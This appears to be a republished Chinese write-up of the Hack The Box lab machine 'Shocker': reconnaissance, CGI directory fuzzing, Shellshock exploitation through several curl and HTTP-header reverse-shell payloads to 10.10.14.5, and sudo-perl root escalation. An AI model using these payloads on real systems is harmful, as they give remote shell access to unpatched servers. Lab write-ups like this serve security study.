當(dāng)前位置：首頁 > 编程资源 > 综合教程 >内容正文

综合教程

HTB-靶机-Shocker

發(fā)布時(shí)間：2023/12/15 综合教程 44 生活家

生活随笔收集整理的這篇文章主要介紹了 HTB-靶机-Shocker 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

本篇文章僅用于技術(shù)交流學(xué)習(xí)和研究的目的，嚴(yán)禁使用文章中的技術(shù)用于非法目的和破壞，否則造成一切后果與發(fā)表本文章的作者無關(guān)

靶機(jī)是作者購買VIP使用退役靶機(jī)操作，顯示IP地址為10.10.10.56

本次使用https://github.com/Tib3rius/AutoRecon 進(jìn)行自動(dòng)化全方位掃描

執(zhí)行命令

autorecon 10.10.10.56 -o ./Shocker-autorecon

得到如下結(jié)果：

先訪問80web應(yīng)用看看

沒看到啥東西，再看看上面掃描結(jié)果中的爆破目錄信息

發(fā)現(xiàn)一個(gè)目錄cgi-bin 嘗試使用wfuzz進(jìn)行爆破猜測可能存在的后綴

wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.10.10.56/cgi-bin/FUZZ.sh

得到一個(gè)uri地址/cgi-bin/user.sh 將此文件下載下來

看到此情景判斷可能存在shellshock漏洞，漏洞詳情：https://www.cvedetails.com/cve/CVE-2014-6271/

上面還是可以使用nmap掃描看看，命令如下：

nmap -sV -p 80 --script=http-shellshock.nse --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56

確認(rèn)上述存在shellshock ，那么就可以開始利用其漏洞拿shell，詳細(xì)的利用方式如下:

利用方式：
下面方式都可以正常利用，在user-agent頭也可以

curl -H 'Cookie: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.14.5/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -H 'Cookie: () { :;}; echo; /bin/sh -i >& /dev/tcp/10.10.14.5/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -H 'Cookie: () { :;}; /bin/sh -i >& /dev/tcp/10.10.14.5/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -H 'Cookie: () { :;};  /bin/bash -i >& /dev/tcp/10.10.14.5/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -A '() { :; }; /bin/bash -i > /dev/tcp/10.10.14.5/8833 0<&1 2>&1' http://10.10.10.56/cgi-bin/user.sh
上面執(zhí)行的時(shí)候需要本地監(jiān)聽端口


通過burpsuite提交請求也可以
GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
User-Agent: () { :;};  /bin/bash -i >& /dev/tcp/10.10.14.5/8833 0>&1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close

上面執(zhí)行的時(shí)候需要本地監(jiān)聽端口

直接通過exploit拿shell
https://www.exploit-db.com/exploits/34900
python 34900.py  payload=reverse rhost=10.10.10.56 lhost=10.10.14.5 lport=9966 pages=/cgi-bin/user.sh

第二種自定義的exploit
https://github.com/nullarmor/hackthebox-exploits/blob/master/shocker/exploit.py
python nullarmor-exploit.py --rhost 10.10.10.56 --lhost 10.10.14.5 --lport 8899

第三種自定義的exploit
https://github.com/nccgroup/shocker
python shocker.py -H 10.10.10.56 --command "/bin/bash -i > /dev/tcp/10.10.14.5/8833 0<&1 2>&1" -c /cgi-bin/user.sh
上面執(zhí)行的時(shí)候需要本地監(jiān)聽端口

成功反彈shell

這里提權(quán)很簡單，每次我都會(huì)習(xí)慣執(zhí)行下sudo -l ，這里是發(fā)現(xiàn)可以直接通過perl執(zhí)行sudo權(quán)限拿到root權(quán)限

迷茫的人生，需要不斷努力，才能看清遠(yuǎn)方模糊的志向！

總結(jié)

以上是生活随笔為你收集整理的HTB-靶机-Shocker的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： Visual C++ 2008 runt
下一篇：英雄联盟s8比赛时间表